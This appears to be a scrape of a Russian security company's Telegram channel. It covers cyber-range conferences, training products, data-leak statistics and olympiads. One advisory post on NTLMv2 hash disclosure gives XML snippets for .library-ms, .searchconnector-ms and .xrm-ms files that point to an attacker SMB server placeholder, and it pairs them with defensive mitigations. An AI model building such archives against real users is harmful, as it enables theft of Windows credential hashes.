Telegram Web
«Перспективный мониторинг» представил инструменты для эффективного обучения специалистов по ИБ на конференции киберполигонов Ampire 360°

На площадке Кибердома встретились более 300 участников процесса обеспечения информационной безопасности в различных сферах экономики — ИБ-специалисты, представители бизнеса и государственного сектора, вендоры и интеграторы, преподаватели вузов, студенты, ученики московских школ и колледжей.

На конференции «Перспективный мониторинг» и Кибердом презентовали совместный проект по проведению киберучений на фиджитал-полигоне Кибердома. Первыми тренировку на иммерсивных макетах Кибердома прошли финалисты соревнований Ampire Trophy.

В деловой программе с докладами выступили представители Министерства цифрового развития и связи Кузбасса, РТУ МИРЭА, КГЭУ, Кибердома, а также эксперты компаний ИнфоТеКС и «Перспективный мониторинг».

🔗 Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍981
Конференция Ampire 360° прошла, а видео и фото остались

▶️ Смотрите, как это было, в нашем коротком ролике с комментариями Александра Пушкина, заместителя генерального директора ПМ.

Фотографии с конференции уже опубликованы в альбоме в VK.
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍621
Платформа Smart Monitor интегрировала TI-фиды «Перспективного мониторинга» для усиления информационной безопасности заказчиков

VolgaBlob и «Перспективный мониторинг» расширили технологическое партнерство, направленное на защиту информации российских компаний. В апреле 2025 года экспертные данные «Перспективного мониторинга» были интегрированы в систему Smart Monitor. TI-фиды будут обогащать контекстом детектируемые SIEM события и инциденты, что сделает защиту и выявление новых угроз более эффективными.

Интеграция TI-фидов «Перспективного мониторинга» — часть программы развития платформы Smart Monitor.

«Качественные индикаторы компрометации, которые позволяют с высокой долей вероятности свидетельствовать о вредоносной активности, значительно усиливают возможности SIEM, превращая сбор данных в мощный инструмент обнаружения угроз. Именно поэтому мы уделяем такое внимание интеграции с ведущими TI-провайдерами. Наша цель — не просто добавить еще один источник данных, по которым можно заметить признаки вредоносной активности, а дать клиентам гибкость выбора: возможность комбинировать поставщиков под собственные нужды, бюджет и отраслевые требования», — комментирует Александр Басов, SalesOps VolgaBlob.


«Мы стремимся улучшать ИБ-экспертизу в российских решениях информационной безопасности и гибко подстраиваться под любой класс средств защиты информации. Для нас как поставщика фидов важно, чтобы конечный пользователь был эффективно защищен, и его средства защиты информации имели максимальный охват сведений о киберугрозах», — прокомментировал менеджер продукта «Перспективного мониторинга» Кирилл Кузнецов.


🔗Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1341
Ampire Junior — одно из самых актуальных и полезных решений ПМ в области информационной безопасности.

Почему? Рассказываем.

🟧Он предназначен для школьников и любых пользователей без специальных знаний в ИБ
🟧Соответствует Концепции информационной безопасности детей, утвержденной Председателем Правительства РФ Михаилом Мишустиным
🟧Соответствует Указу Президента РФ «О стратегии комплексной безопасности детей РФ на период до 2030 года»
🟧Содержит лабораторные работы по актуальным темам: кибербуллинг, фишинг, фейковые новости, GEOINT (геопространственная разведка), основы криптографии и др.

ℹ️ Главное отличие урока на Ampire Junior в том, что ребёнок может на практике освоить правила безопасного использования интернета и безопасного общения, чтобы знать, как защитить себя и свои персональные данные.

▶️ Смотрите видеоотзыв об 🧑‍🏫🧑‍🏫🧑‍🏫🧑‍🏫🧑‍🏫🧑‍🏫от потенциального пользователя продукта — учительницы математики московской школы.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍42
❗️ Еще одно раскрытие NTLM

В марте текущего года специалистами направления исследования киберугроз были зафиксированы уязвимости в ОС Windows, приводящие к раскрытию NTLMv2 хэшей:

🟠 CVE-2025-24071
🟠 CVE-2025-24054

После исследования удалось выявить и подтвердить 2 аналогичных способа эксплуатации при помощи файлов с расширением .library-ms и .searchconnector-ms. Но на этом вариации эксплуатации не заканчиваются. Уже на предыдущей неделе был установлен ещё один способ кражи скомпрометированных данных пользователей, где использовались .xrm-ms файлы

library-ms -- содержит информацию о настройках и содержимом библиотеки, включая пути к папкам и метаданные

searchconnector-ms -- содержит информацию о конфигурации соединителя для поиска, который используется в Windows для интеграции внешних источников

xrm-ms -- может включать данные, необходимые для импорта или экспорта решений между различными инстанциями CRM


🟧Описание уязвимости:

Источником уязвимости является механизм обработки перечисленных файлов после их извлечения из архивов. Неявное доверие и автоматическая обработка содержимого приводит к возможности раскрытия хэша NTLMv2 третьим лицам.

🟧Потенциально возможный вектор атаки:

Злоумышленник отправляет специально подготовленный архив, например, в форматах ZIP или RAR, содержащий файл со структурой XML.
В значении соответствующего поля должен быть указан адрес SMB-сервера злоумышленника.

.library-ms: <simpleLocation>        
<url>\\\\{ip_address}\\shared</url>

.searchconnector-ms: <simpleLocation>
<url>\\\\{ip_address}\\shared</url>

.xrm-ms: <?xml-stylesheet href="\\{ip_address}\shared" ?>


После извлечения полученного файла будет выполнен сетевой SMB-запрос и передан хэш NTLMv2 текущего пользователя.

🟧Обнаружение и предотвращение:

🟠Обновить операционную систему до последней актуальной версии
🟠Ограничить сетевые соединения с внешними адресами по протоколу SMB
🟠Детектировать события безопасности ОС Windows 4663, в которых реализована попытка разархивации ранее описанных файлов

#AM_Rules
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1452🤯1🤩1
Мониторинг утечек данных за апрель 2025 года

В апреле выявлено несколько значительных инцидентов утечек, охвативших широкий круг сфер. Общий объём скомпрометированных данных — свыше 66 млн записей и почти 2 Гб документов и аудиофайлов, включая конфиденциальные сведения о сотрудниках, клиентах и внутренних системах.

❗️ Основные пострадавшие сферы и объёмы утечек:

🟧 Государственные структуры — 55 млн записей
🟧 Интернет-магазины — 10,8 млн записей
🟧 Платформы электронной коммерции — 796 тыс. записей
🟧 Автопромышленность — 32,8 тыс. записей
🟧 Банковский сектор — 8,35 тыс. записей
🟧 IT-компании (включая подрядчиков госсектора) — 2,7 тыс. записей и 1,8 Гб документов
🟧 Сфера доставки и ретейла — 17,7 тыс. записей
🟧 Туризм — 9,4 тыс. записей
🟧 Образование, общественные и религиозные сообщества — 1,6 тыс. записей

❗️ Общие цифры:

🟠 Общее количество утечек: более 67 млн записей.
🟠 Медиана: 9,4 тыс. записей.

❗️ Что важно знать:

🟧Самая масштабная утечка месяца затрагивает государственный сектор.
🟧В IT и промышленности продолжаются утечки не только пользовательских, но и внутренних служебных документов.
🟧Утечки в банках затрагивают как клиентов, так и персонал, создавая почву для фишинга и компрометации инфраструктур.
🟧В апреле общее количество утечек стало меньше, но объём скомпрометированных данных оказался разительно больше в сравнении с мартовским отчётом.

❗️Как защититься:

🟧Проверяйте, не были ли ваши данные скомпрометированы — воспользуйтесь сервисом НКЦКИ 🔗 «Безопасность пользователей в сети интернет».
🟧Регулярно меняйте пароли и не используйте один и тот же пароль для разных сервисов.
🟧Включите двухфакторную/многофакторную аутентификацию — это значительно снижает риски.
🟧Будьте бдительны — мошенники могут использовать утёкшие данные для фишинга и других атак.

#мониторинг_угроз
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥105🤩22
ПМ принял участие в награждении победителей олимпиады имени И. Я. Верченко в МТУСИ

В МТУСИ в рамках Дня открытых дверей факультетов КиИБ и ЦЭиМК прошла торжественная церемония награждения победителей и призёров Межрегиональной олимпиады школьников имени И. Я. Верченко по профилю «Информатика и компьютерная безопасность».

Олимпиада Верченко, входящая в Перечень олимпиад школьников Минобрнауки России (2 уровень), ежегодно проводится с 2006 года при поддержке Академии ФСБ России, Академии ФСО России и содействии Astra Linux и других ведущих компаний ИБ.

Победители и призёры заключительного этапа получают право использовать льготы при поступлении на направления подготовки, соответствующие профилю «Компьютерная безопасность», в МТУСИ или другие вузы РФ.

Подарки победителям от «Перспективного мониторинга» — партнёра МТУСИ — вручил специалист по информационной безопасности Ярослав Немцов.

Также «Перспективный мониторинг» был представлен на Дне открытых дверей на стенде.

▶️ Видео: МТУСИ.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥3🤩1
Ampire для всех — ИБ, ИТ и непрофильных специалистов

🔥 О планах развития киберполигона до конца 2026 года рассказали в техническом докладе Ampire Keynotes на конференции Ampire 360°.

❗️ Ключевые тезисы:

🥇 Теперь у нас 🟠32 киберполигона в стране (+12 за год), проведено 🟠500 киберучений сотрудниками ПМ, сертифицировано 🟠300+ преподавателей. А ещё есть 🟠170 резюме с упоминанием Ampire.

🥇 Появятся новые индивидуальные форматы тренировок. Полученные в них навыки можно будет с успехом применять в полноформатных киберучениях Blue Team, CSIRT, Red Team.

🥇 Будут интегрированы новые СЗИ в шаблоны. Сейчас ведётся работа над интеграцией SIEM, а до конца 2026-го запланировано внедрение ещё нескольких СЗИ.

🥇 Разработана концепция киберфизических стендов в Ampire. Теперь можно будет интегрировать физические устройства: СЗИ, АРМ и другие. Гибрид виртуальной и физической инфраструктуры позволит пользователям отрабатывать навыки на «родном железе».

🥇 Преподаватели получат новые инструменты для проведения киберучений. Это повысит гибкость и скорость подготовки к практическим занятиям. Из ближайшего — генератор случайных сценариев на основе конфигураторных узлов в версии 1.7.

🧑‍🏫🧑‍🏫🧑‍🏫🧑‍🏫🧑‍🏫🧑‍🏫

🥇 В Ampire Junior появятся лабораторные работы на 40 минут. Они ориентированы на федеральные рабочие программы по учебным предметам. Учителя смогут комфортно и гибко использовать новые сценарии в школьных уроках любого формата.

🥇 Существующие сценарии в Ampire Junior будут расширены новыми заданиями. В течение двух кварталов планируется масштабное обновление сценария по фишингу.

ℹ️ Сейчас совершенствуется система контроля готовности тренировок для повышениях их стабильности и модернизируются механизмы обновления заказчиков для более быстрой и своевременной доставки изменений. Ждите новых обновлений киберполигона и применяйте новые функции на практике!

🔗 ampire.team
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥6🥰52
На киберполигоне Ampire практикуются будущие ИБ-специалисты в РТУ МИРЭА

О том, как использование 🥇 Ampire повышает качество обучения, рассказал доцент кафедры КБ-1 Николай Васильев.

▶️ Смотрите наш новый ролик в VK.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥7🤯22
Специалисты ПМ выступили на ХХХ научно-практической конференции Союзного государства «Комплексная защита информации»

Мероприятие проходило с 14 по 16 мая в городе Лида, Беларусь.

На конференции были рассмотрены актуальные задачи обеспечения информационной безопасности Союзного государства. Особое внимание уделено укреплению сотрудничества в области информационной безопасности, вопросам технической защиты информации, современным методам и средствам криптографической защиты, кибербезопасности, организационно-правовому обеспечению безопасности и современным технологиям подготовки кадров в сфере информационной безопасности.

🐶 «Перспективный мониторинг» на конференции представили:

🟠Анна Хромова, руководитель направления исследования информационного пространства, с докладом «Алгоритм социальной атаки: как формируются сценарии киберугроз».
Почему кибератаки начинаются не с технологий, а с людей? Как мошенники выстраивают легенды и используют утечки?
На докладе разобрали, как работает социальная инженерия и как ей противостоять, какие сейчас используются технологии.


🟠 Артур Слепнев, аналитик данных, с докладом «Развитие киберполигонов в контексте обучения противодействию фишинговым атакам».
Важность практического обучения. Цели, которые мы ставим при обучении участников киберполигона. Методология написания сценариев для киберполигона Ampire Junior.


ℹ️ Организаторы конференции: Постоянный комитет Союзного государства и Парламентское собрание Союза Беларуси и России при организационной поддержке Научно-исследовательского института технической защиты информации.

В работе конференции приняли участие более ста представителей Беларуси и России: 13 докторов наук, 19 кандидатов наук, 8 профессоров, 10 доцентов и старших научных сотрудников, а также специалисты-практики, руководители организаций, специализирующихся на решении практических вопросов в сфере обеспечения информационной безопасности.

🔗Источник
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1285🔥4
ПМ впервые провёл на Ampire киберквест Red Team+Blue Team

В минувшие выходные в Российском государственном университете нефти и газа имени Губкина проходил финальный тур Всероссийской олимпиады по информационной безопасности.

❗️ Во время мероприятия ПМ провёл двухчасовой киберквест Red Team+Blue Team.

Сначала старший специалист по ИБ Александр Сальников провёл тренировку в формате Red Team. Участники в интерактивном формате примеряли на себя роль пентестеров: искали уязвимости и эксплуатировали их.

Во второй части киберквеста участники вместе с руководителем учебно-методического направления Александром Фефиловым устраняли последствия кибератаки.

«Задача такого киберквеста — показать участникам атаку глазами как нарушителя, так и защищающегося. Было задействовано два шаблона — Red Team и Blue Team. На одном атаковали, на другом — показывали, как это видит защита, и что надо сделать, чтобы защититься. Для атаки использовалась уязвимость в плагине Duplicator CMS WordPress. На Red Team она детектируется и эксплуатируется, на Blue Team — нейтрализуется», — Александр Сальников.


В киберквесте принимали участие студенты СПбГМТУ, ДГТУ, МГТУ ГА, Оренбургского филиала РГУ нефти и газа имени Губкина, КГУ, ИрГУПС, МИЭТ, СГТУ имени Гагарина, МГТУ имени Баумана и других вузов.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥112
2025/07/13 15:33:42
Back to Top
HTML Embed Code: